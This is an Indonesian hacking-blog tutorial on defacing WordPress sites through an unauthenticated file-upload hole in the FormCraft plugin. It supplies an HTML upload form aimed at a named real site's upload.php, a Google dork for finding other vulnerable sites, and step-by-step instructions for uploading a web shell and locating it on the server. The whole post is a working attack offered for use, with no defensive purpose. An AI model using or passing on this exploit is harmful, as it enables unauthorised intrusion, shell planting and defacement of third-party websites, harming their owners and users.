Deface Dengan Wordpress Plugins FormCraft | Warungdeface

Malam ndan :)
Kali ini saya mau share tutorial deface dengan Wordpress Plugins FormCraft, ok langsung saja disimak ;)
Bahan - Bahan :
- Shell ( cari di google :p )
- CSRF
Script CSRF  :
<form method="POST" action="http://buildfire.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Save dengan Ekstensi HTML ! contoh : csrf.html

Langkah - Langkah :
1. Buka www.google.com, lalu masukan dork berikut :
     inurl:/wp-content/plugins/formcraft ( Kembangin lagi ;) )
2. Lalu pilih salah satu sitenya
3. Kalo sudah menemukan sitenya, masukan exploit berikut :  
    /wp-content/plugins/formcraft/file-upload/server/php/upload.php
4. Jika vuln, akan seperti ini :

5. Langkah selanjutnya adalah membuka CSRFnya :D
6. Copy sitenya dan paste di CSRF

7. Save, dan buka CSRFnya lalu Upload shell kita ;)
    * Jika tidak punya shell, cari terlebih dahulu di google, lalu download :D :p
8. Jika sukses meng upload shell, akan seperti ini :

 9. Setelah shell berhasil ke upload, tinggal dibuka deh =))

     Tempat akses shellnya disini :
     localhost/wp-content/plugins/formcraft/file-upload/server/php/files/-namashell.php
      * Kadang shell juga berupa random, kayak gini '' 154897dc834ecb---aleale.php '' 

     contoh :
    localhost/wp-content/plugins/formcraft/file-upload/server/php/files/154897dc834ecb---aleale.php
    

Sekian tutornya dan salam ganteng,Semoga bermanfaat :D

Thx to= etairoattacker